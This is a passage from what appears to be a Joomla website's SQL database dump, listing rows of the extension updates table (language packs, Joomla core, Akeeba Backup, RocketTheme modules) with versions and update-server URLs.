Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20358,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20359,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20360,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20361,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20362,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20363,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20364,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20365,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20366,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20367,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20368,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20369,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20370,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20371,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20372,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20373,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20374,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20375,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20376,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20377,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20378,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20379,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20380,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20381,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20382,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20383,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20384,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20385,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20386,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20387,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20388,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20389,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20390,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20391,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20392,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20393,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20394,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20395,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20396,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20397,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(20398,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(20399,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(20400,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20401,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20402,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20403,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20404,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20405,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20406,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20407,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20408,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20409,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20410,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20411,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20412,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20413,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20414,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20415,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20416,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20417,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20418,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20419,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20420,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20421,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20422,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20423,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20424,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20425,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20426,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20427,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20428,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20429,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20430,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20431,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20432,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20433,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20434,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20435,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20436,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20437,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20438,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20439,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20440,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20441,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20442,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20443,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20444,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20445,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20446,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20447,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20448,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20449,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20450,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(20451,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(20452,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(20453,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20454,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20455,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20456,3,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20457,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20458,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20459,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20460,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20461,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20462,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20463,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20464,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20465,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20466,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20467,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20468,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20469,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20470,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20471,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20472,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20473,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20474,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20475,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20476,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20477,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20478,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20479,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20480,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20481,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20482,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20483,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20484,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20485,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20486,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20487,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20488,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20489,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20490,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20491,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20492,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20493,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20494,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20495,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20496,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20497,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20498,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20499,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20500,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20501,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20502,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20503,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20504,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(20505,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(20506,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(20507,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(20508,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(20509,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(20510,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(20511,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(20512,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(20513,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20514,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(20515,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(20516,57,0,'French','','pkg_fr-FR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(20517,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(20518,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(20519,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(20520,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(20521,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(20522,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(20523,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(20524,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(20525,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(20526,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(20527,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(20528,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(20529,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(20530,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(20531,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(20532,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(20533,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(20534,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(20535,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(20536,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(20537,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(20538,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(20539,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(20540,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(20541,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(20542,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(20543,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(20544,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(20545,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(20546,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(20547,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(20548,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(20549,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(20550,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(20551,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(20552,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(20553,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(20554,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(20555,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(20556,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(20557,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(20558,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(20559,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(20560,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(20561,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(20562,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(20563,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(20564,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(20565,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.4.1FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(20566,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(20567,1,0,'Joomla','','joomla','file','',0,'3.9.21','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(20568,67,0,'Akeeba Backup Core 